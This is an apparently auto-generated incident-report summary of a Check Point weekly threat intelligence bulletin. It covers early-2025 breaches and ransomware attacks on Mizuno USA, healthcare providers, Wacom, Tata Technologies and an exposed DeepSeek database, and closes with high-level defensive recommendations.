Full Report
For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Mizuno USA, giant sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social […] The post 3rd February – Threat Intelligence Report appeared first on Check Point Research.
Analysis Summary
This summary focuses on the confirmed and detailed incidents from the provided text, structuring them chronologically where possible based on the reported dates of compromise.
# Incident Report: Summary of Recent Cyber Incidents (Late 2024 – Early 2025)
## Executive Summary
Several organizations across manufacturing, technology, and healthcare sectors experienced significant cyber incidents, primarily driven by ransomware and data theft campaigns between August 2024 and February 2025. Key victims include Mizuno USA and Community Health Center, which suffered major data exfiltration involving PII and financial details. Response actions varied from full network shutdowns (NY Blood Center) to temporary service suspensions (Tata Technologies), highlighting systemic risks related to exposed databases, exploited vulnerabilities (Fortinet), and advanced malware like Xloader.
## Incident Details
- **Discovery Date:** Varies (Latest related discovery: Feb 2025 on DeepSeek DB)
- **Incident Date:** Ranges from August 2024 (Mizuno) to January 2025 (NY Blood Center, CHC)
- **Affected Organization:** Mizuno USA, El Cruce Hospital, New York Blood Center, Tata Technologies, Wacom, Community Health Center (CHC), Smiths Group, DeepSeek (DB Exposure)
- **Sector:** Manufacturing (Sports Equipment, Electronics), Healthcare, IT Services, Engineering
- **Geography:** USA, Argentina, India, Japan, Israel, UK (Varies by incident)
## Timeline of Events
**Note:** Specific start times are often not disclosed, so the focus is on the time window of compromise.
### Initial Access
- **Date/Time:** August – October 2024 (**Mizuno USA**)
- **Vector:** Not explicitly stated, but resulted in two months of undetected presence.
- **Details:** Attackers maintained access leading to the exfiltration of PII and financial data.
- **Date/Time:** November 28, 2024 – January 8, 2025 (**Wacom**)
- **Vector:** Malicious code injection on the online checkout page (Web Skimming/Magecart style).
- **Details:** Aimed at stealing customer payment card information.
- **Date/Time:** January 2, 2025 (**Community Health Center**)
- **Vector:** Unauthorized access to systems.
- **Details:** Compromise exposed PII, SSNs, medical, and financial data for over one million individuals.
- **Date/Time:** January 26, 2025 (**New York Blood Center Enterprises**)
- **Vector:** Ransomware attack.
- **Details:** IT systems impacted, leading to an immediate network shutdown and delays in blood donations.
- **Date/Time:** Undisclosed, recent (**El Cruce Hospital**)
- **Vector:** Ransomware attack by Medusa group.
- **Details:** Significant attack on IT networks; threat made public to disclose 760GB of patient data.
- **Date/Time:** Undisclosed, recent (**Tata Technologies**)
- **Vector:** Ransomware attack.
- **Details:** Caused temporary suspension of some IT services; core client systems remained unaffected.
### Later Movement & Impact
- **Date/Time:** Ongoing presence confirmed for two months at Mizuno USA (Aug-Oct 2024).
- **Details:** Attackers successfully exfiltrated sensitive personal identifying information (PII), including SSNs, financial data, driver’s licenses, and passport numbers.
- **Date/Time:** Concurrent with DB exposure (**DeepSeek**)
- **Vector:** Misconfiguration (Publicly accessible ClickHouse database).
- **Details:** Exposed over a million log streams, including chat history and API secrets, granting potential control rights due to lack of authentication.
### Detection & Response
- **Detection:** Varies significantly across reports; Mizuno detection was post-facto disclosure.
- **Response (NY Blood Center):** Took the network offline immediately; restoration timeline unknown.
- **Response (El Cruce):** Sought remediation following demands from the Medusa group.
- **Response (Wacom):** Implied response via addressing payment card theft issues post-Jan 8, 2025.
## Attack Methodology
| Category | Techniques/Observed Tools |
| :--- | :--- |
| **Initial Access** | Exploitation of public configuration (DeepSeek exposure), Malicious code injection (Wacom skimming), Ransomware deployment (NYBCE, El Cruce, Tata) |
| **Persistence** | Modification of Windows registry keys (Windows Locker, Xloader), Copying files to specific directories (Xloader) |
| **Privilege Escalation** | Authentication Bypass using alternate paths (CVE-2024-55591 related to Fortinet), Use of ShellExecuteExW API without admin rights (Arcus Media) |
| **Defense Evasion** | NTDLL hook evasion, Runtime code encryption (Xloader) |
| **Credential Access** | Theft of browser/email/FTP credentials (Xloader), Theft confirmed for SSNs/Financial Data (Mizuno, CHC) |
| **Discovery** | General reconnaissance indicated by prolonged presence (Mizuno) |
| **Lateral Movement** | Not detailed for major breaches, implied by prolonged access. |
| **Collection** | Harvesting of PII, SSNs, Financial Data (Mizuno, CHC) |
| **Exfiltration** | Confirmed data exfiltration at Mizuno USA. |
| **Impact** | File encryption (Windows Locker, Arcus, Medusa), System/Service disruption (NY Blood Center, Tata), Data disclosure threats (El Cruce) |
## Impact Assessment
- **Financial:** Ransom demands noted (El Cruce: $200K BTC). Costs related to investigations and remediation likely high for all victims.
- **Data Breach:** Massive PII/PHI exposure:
- **Mizuno USA:** Names, SSNs, Financial account info, Driver’s license, Passport numbers.
- **CHC:** Personal details, SSNs, Medical information, Financial data (1 million+ patients).
- **Wacom:** Customer payment card information (PCI data).
- **El Cruce:** 760GB of data, including patient information.
- **Operational:** Significant disruption confirmed at NY Blood Center (delayed donations); temporary suspension of services at Tata Technologies.
- **Reputational:** High reputational damage due to confirmed large-scale patient/customer data theft.
## Indicators of Compromise
*(Note: IOCs are presented in their defanged/generic form as specific details were not provided for the incidents themselves, only related malware signatures.)*
- **Network Indicators:** (Related to Xloader: Communication to command-and-control infrastructure)
- **File Indicators:** Specific malware signatures noted: `Ransomware.Wins.BianLian.*`, `Trojan.Win.Xloader.*`
- **Behavioral Indicators:** Unauthorized system access/modification, Modification of Windows registry for persistence, Deletion of shadow copies (Arcus/Windows Locker).
## Response Actions
- **Containment:** Immediate network shutdown (NY Blood Center); Patching and infrastructure quarantine following vulnerability disclosure (DeepSeek).
- **Eradication:** Unknown specifics for ransomware attacks; focused on removing malicious artifacts implied by malware analysis (e.g., Xloader persistence points).
- **Recovery:** NY Blood Center delayed restoration; Tata Technologies focused on keeping core client systems operational during recovery.
## Lessons Learned
- Prolonged attacker presence (two months at Mizuno) indicates insufficiently monitored internal environments or weak east-west traffic detection.
- Critical control failures: Lack of authentication for sensitive databases (DeepSeek) poses an immediate, catastrophic risk leading to asset exposure.
- Protection against established threats: Advanced endpoint protection (e.g., Check Point solutions mentioned) is necessary to detect known ransomware families (BianLian, Medusa) and sophisticated Trojans (Xloader).
## Recommendations
- Implement continuous monitoring focused on network egress points and anomalous data movement to detect prolonged attacker presence sooner.
- Immediately audit all publicly accessible databases (especially those containing sensitive logs or configuration data) to ensure mandatory authentication is enforced.
- Prioritize patching for critical vulnerabilities such as zero-day exploits affecting perimeter devices (e.g., FortiGate authentication bypass CVE-2024-55591).
- Enhance existing defense mechanisms against web skimming attacks targeting e-commerce checkout pages (Wacom incident).